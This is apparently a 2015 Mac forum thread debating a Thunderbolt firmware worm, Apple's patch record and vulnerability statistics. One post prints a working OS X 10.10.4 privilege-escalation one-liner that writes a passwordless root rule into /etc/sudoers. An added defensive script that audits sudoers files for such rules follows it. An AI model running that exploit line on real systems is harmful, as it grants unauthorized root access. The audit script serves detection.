This is hardly the first time that people CLAIM that Apple sweeps security issues under the rug etc.

You know as little or as much as anybody....

Nope. There is plenty of info out there, if you know how to do a basic search.

Here is a chart of OS vulnerabilities in 2014. Note that Apple and iOS are right up at the top.



http://www.gfi.com/blog/most-vulnerable-operating-systems-and-applications-in-2014/

Here is more:

Google gives Apple and Microsoft an ultimatum: 'Patch your software vulnerabilities, or we'll make them public'

This has been going on for years -- this is from 2008:

"Apple was widely skewered for being among the last to fix a gaping security hole in the net's address lookup system that could allow the wholesale hijacking of users' internet connections. And now that the company has finally got around to issuing a patch, there's just one problem: it doesn't work on client versions of Mac OS X."

Cheers.
 
Ha! I use a Hackintosh which uses UEFI bios that are foreign to this worm. There is no firmware in my case. I'm all safe!
 
Nope. There is plenty of info out there, if you know how to do a basic search.

Here is a chart of OS vulnerabilities in 2014. Note that Apple and iOS are right up at the top.

http://www.gfi.com/blog/most-vulnerable-operating-systems-and-applications-in-2014/

Here is more:

Google gives Apple and Microsoft an ultimatum: 'Patch your software vulnerabilities, or we'll make them public'

This has been going on for years -- this is from 2008:

"Apple was widely skewered for being among the last to fix a gaping security hole in the net's address lookup system that could allow the wholesale hijacking of users' internet connections. And now that the company has finally got around to issuing a patch, there's just one problem: it doesn't work on client versions of Mac OS X."

Cheers.

Hmm but all OS X versions are bundled together whereas Windows are split between versions, doesn't seem a very honest way of reporting. The CVSS Scores report also tells a different story. Across Microsoft's products for the last year there are 513 vulnerabilities vs. 398 for Apple. The weighted average score (where higher is worse) is also higher for Microsoft; 8.4 vs. 7 for Apple.


CVSS Scores for Apple http://www.cvedetails.com/cvss-score-charts.php?vendor=Apple&vendor_id=49&fromform=1

CVSS Scores for MS http://www.cvedetails.com/cvss-score-charts.php?vendor=Microsoft&vendor_id=26&fromform=1

Finally Google is being disingenuous in the extreme, it's not like Android doesn't have its own vulnerabilities.
 
Thank goodness these "researchers" are on our side.

And then there are the others that have the same knowledge that are not on our side.

Apple enthusiasts busy defending Apple, while living in complete denial about the risks, are just what Apple counts on, so they can push security down their list of priorities.

Well, in Apple's defense, they've been selling that illusion for three decades and naturally cannot publicly say that their products are not in the least more secure than those of their competitors...

Just sandbox all browsers and implement a thorough scan of anything downloading. Sandboxing the user folders would also help. Access to system folders should require a password.

Sorry, but none of this would protect you against this kind of attack.
 
Hmm but all OS X versions are bundled together whereas Windows are split between versions, doesn't seem a very honest way of reporting. The CVSS Scores report also tells a different story. Across Microsoft's products for the last year there are 513 vulnerabilities vs. 398 for Apple. The weighted average score (where higher is worse) is also higher for Microsoft; 8.4 vs. 7 for Apple.


CVSS Scores for Apple http://www.cvedetails.com/cvss-score-charts.php?vendor=Apple&vendor_id=49&fromform=1

CVSS Scores for MS http://www.cvedetails.com/cvss-score-charts.php?vendor=Microsoft&vendor_id=26&fromform=1

Finally Google is being disingenuous in the extreme, it's not like Android doesn't have its own vulnerabilities.
You know what. It’s just beginning.
I fear the next few years are going to be a rough ride for us Mac users. Probably just as rough for Tim Cook - maybe he and Jony are hoping that only the most slimmed down of code can get in.

I think in that next Keynote Tim will tell us about a new feature for easy firmware updates……….
 
You know what. It’s just beginning.
I fear the next few years are going to be a rough ride for us Mac users.

Vulnerabilities are increasing and attacks getting more sophisticated across all platforms. Partly, I expect, because OS's and applications are getting more complex, with increased complexity comes increased errors.

Hackers have the easier job though; they can spend all their time looking for vulnerabilities and they only have to succeed once to have won. OS designers and coders have to succeed all the time. All their code must be correct, exceptions handled, bounds and memory allocation correct etc. All the time! It's no small task and humans will always make mistakes.

What really matters is how vendors respond when something is discovered. This is where I think Apple could stand to improve, partly with communication and partly with response time.
 
That's like saying we're gonna continue to let criminals murder and rape people until we have better law enforcement. We know that's not the answer, prevention is. It's an idiotic mindset.

Yep, a security researcher disclosing a vulnerability in a computer is *exactly* like society condoning the rape and murder of its citizens in order to make the police look bad. o_O:confused::rolleyes:o_O
 
Vulnerabilities are increasing and attacks getting more sophisticated across all platforms. Partly, I expect, because OS's and applications are getting more complex, with increased complexity comes increased errors.

The attacks are becoming more sophisticated because software makers are being more sophisticated in securing their products - most of the low-hanging fruit (security flaws) have already been picked.
 
Of all the alleged Mac "hacks" that have surfaced over the years, this is the only one that has seemed to be a legitimate concern to me. The other hacks usually required direct access to your computer or installing some shady torrent software after putting in an admin password. This thing can be remotely installed from a website and can't be wiped. Sure, don't visit a shady website you say. But if a web server is compromised in some other way and this hack is installed, you could get it from nearly anywhere. This is bad.

I think the XARA Keychain vulnerability (https://www.macrumors.com/2015/06/17/ios-osx-cross-app-keychain-security-flaw/) is still pretty high in the list of concerning security issues too.

And so is the latest privilege-escalation bug as well (http://arstechnica.com/security/201...-x-comes-under-active-exploit-to-hijack-macs/).

So that makes it more like 3 serious potential hacks as of late, at the very least.
 
Is there a list of Macs known to be susceptible to this, or is it all of them? I was looking at (eventually) getting a new iMac, but now not so sure.

And before any fanboys share their "0.2" - I take security very seriously, and while I love Apple, I'm not going to invest in such an expensive machine with doors like this wide open.

There are problems with PCs too. Some serious, some not. Remember the Lenovo Superfish issue? Windows 10 is new, but there will be a lot of bad malware for it too.

What would you get other than a Mac? Standard Windows PC will have exploits too. It is still safer to use a Mac.

Also, let's not forget that Windows 10 (even though I love it better than 7 or 8) tracks everything you do (records what you type) by default. So are you going to Linux then?
 
Nope. There is plenty of info out there, if you know how to do a basic search.

Here is a chart of OS vulnerabilities in 2014. Note that Apple and iOS are right up at the top.


http://www.gfi.com/blog/most-vulnerable-operating-systems-and-applications-in-2014/

Here is more:

Google gives Apple and Microsoft an ultimatum: 'Patch your software vulnerabilities, or we'll make them public'

This has been going on for years -- this is from 2008:

"Apple was widely skewered for being among the last to fix a gaping security hole in the net's address lookup system that could allow the wholesale hijacking of users' internet connections. And now that the company has finally got around to issuing a patch, there's just one problem: it doesn't work on client versions of Mac OS X."

Cheers.

Oh please. Where is Windows XP? Why is each Windows version separate? Where is Android with that massive MMS flaw that 950 million devices are vulnerable to? Most of which the carriers and vendors will NOT update.

There was a major flaw in the font system in all recent Windows versions including Windows XP. But they did NOT patch Windows XP.
 
Two questions:

1. Anybody else find that bloke hard to understand? He seems to speak quite quickly, while slightly slurring his words. Might not be an issue if you're familiar with the accent, but a foreign accent plus poor articulation makes it a bit tricky at times.

Seeing "bloke" and "foreign accent" in the same sentence tickled me. You know because I'm an American and think the world revolves around the US.

Obviously, your point and terminology were completely accurate, it just made me smile for some reason. ;-)
 
I apologise for going off topic, but I just have to mention that I like your avatar @macduke. :)

Did you create it yourself? :)
Thanks. Yes I did. I put my username where the serial number should go to fill up some space. Since the forum redesign with the circular avatars happened around the same time that my Apple Watch arrived and the iOS 9 beta was unveiled, I was inspired to mash it all together. I briefly tried one with the El Cap background but it didn't look as good.

iOS style blurs are pretty easy to do in Photoshop. Take a copy of your layer and put a mask on it of whatever shape you want. Then run Blur Gallery > Field Blur on it with a radius of around 50px. Then put a brightness/contrast adjustment layer with a clipping mask on top of that layer. Lower the contrast around 20% and then adjust the brightness until it looks about right.
 
I think the XARA Keychain vulnerability (https://www.macrumors.com/2015/06/17/ios-osx-cross-app-keychain-security-flaw/) is still pretty high in the list of concerning security issues too.

And so is the latest privilege-escalation bug as well (http://arstechnica.com/security/201...-x-comes-under-active-exploit-to-hijack-macs/).

So that makes it more like 3 serious potential hacks as of late, at the very least.
Yikes. Perhaps 10.12 should be the big security update? I mean patch what needs to be patched now but overhaul everything later on.
 
Nope. There is plenty of info out there, if you know how to do a basic search.

Here is a chart of OS vulnerabilities in 2014. Note that Apple and iOS are right up at the top.


http://www.gfi.com/blog/most-vulnerable-operating-systems-and-applications-in-2014/

Here is more:

Google gives Apple and Microsoft an ultimatum: 'Patch your software vulnerabilities, or we'll make them public'

This has been going on for years -- this is from 2008:

"Apple was widely skewered for being among the last to fix a gaping security hole in the net's address lookup system that could allow the wholesale hijacking of users' internet connections. And now that the company has finally got around to issuing a patch, there's just one problem: it doesn't work on client versions of Mac OS X."

Cheers.

All of that will keep on going for all platforms.

As others wrote, not really an honest listing, but I'll take your word for it.

It is debatable whether Apple should respond or just quietly fix.
What is the difference between saying:

We are working on it, taking it seriously etc.etc. and saying nothing?

I would bet my life on it that if they find something totally serious that they will work on it and not ignore it.

It's just that nothing is immediate. It's a process that requires time.
 
There are problems with PCs too. Some serious, some not. Remember the Lenovo Superfish issue? Windows 10 is new, but there will be a lot of bad malware for it too.

What would you get other than a Mac? Standard Windows PC will have exploits too. It is still safer to use a Mac.

Also, let's not forget that Windows 10 (even though I love it better than 7 or 8) tracks everything you do (records what you type) by default. So are you going to Linux then?

To be honest I was looking at the new HP Pavilion 23 2015. Looks super clean like an iMac (yes I know it's an iMac copy, but in all the right ways). If HP is using cryptographic firmware like Dell and Lenovo then it very well could be safer in this category than any susceptible Mac out there.

I'll probably give it a few weeks, but if there's no word of Apple even lifting a finger about this, I may reconsider my next machine purchase.
 
Ha! I use a Hackintosh which uses UEFI bios that are foreign to this worm. There is no firmware in my case. I'm all safe!
If you are using OS X 10.10.4 you are susceptible to the 0-day privilege-escalation bug that this firmware worm is using to infect the system without asking for a password:

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3'| DYLD_PRINT_TO_FILE=/etc/sudoers newgrp

http://arstechnica.com/security/201...-x-comes-under-active-exploit-to-hijack-macs/
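
A defender-side check for the change that one-liner makes, as an added example that is not part of the original post: it scans a sudoers-format file for blanket `NOPASSWD:ALL` rules like the one the command appends to /etc/sudoers. The function names and the sample file contents are constructed for illustration.

```shell
#!/bin/sh
# Added example: read-only audit for sudoers rules shaped like
# "<user> ALL=(ALL) NOPASSWD:ALL". It never modifies the file it reads.

# find_nopasswd_all FILE
# Prints "lineno:rule" for every rule granting passwordless ALL commands.
find_nopasswd_all() {
    awk '
        /^[ \t]*#/ { next }          # comments (and #include directives)
        /^[ \t]*$/ { next }          # blank lines
        /^[ \t]*Defaults/ { next }   # settings, not grants
        {
            rule = $0 " "            # trailing space simplifies the match
            gsub(/[ \t]+/, " ", rule)
            # NOPASSWD tag applied to the command ALL, not to a single path
            if (rule ~ /NOPASSWD: ?ALL[ ,]/) printf "%d:%s\n", NR, $0
        }
    ' "$1"
}

# count_nopasswd_all FILE -> number of flagged rules
count_nopasswd_all() {
    find_nopasswd_all "$1" | wc -l | tr -d ' '
}

# make_sample FILE -> writes a constructed sudoers sample (not from a real host)
make_sample() {
    cat > "$1" <<'EOF'
# sudoers file (constructed sample)
Defaults env_reset
root    ALL=(ALL) ALL
%admin  ALL=(ALL) ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
alice ALL=(ALL) NOPASSWD:ALL
EOF
}

sample=$(mktemp)
make_sample "$sample"
find_nopasswd_all "$sample"
rm -f "$sample"
```

Run it as root against /etc/sudoers and each file under /etc/sudoers.d; a rule it reports that nobody on the machine added deliberately is worth investigating.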
 
Maybe, maybe not. A guy walks up to a convenience charging station in the gate area at ATL. His MacBook (with one, universal port) is pre-infected (intentionally?) with this malware. It transfers to the Thunderbolt/USB-C at the charging station. Now every subsequent user of that charging station will be infected. The same could happen at libraries, A/V presentation situations ("oh you forgot your cable, here borrow this one..."), etc.

The only real fix is to trash all existing Thunderbolt peripherals and cables and replace them with updated, more secure versions. How likely is that?

This is a Thunderbolt exploit. The MacBook with USB-C doesn't even HAVE Thunderbolt. If your Mac does have Thunderbolt it's not used for charging, so why would there be a Thunderbolt port in a public charging station?

Your example is a poor one.
 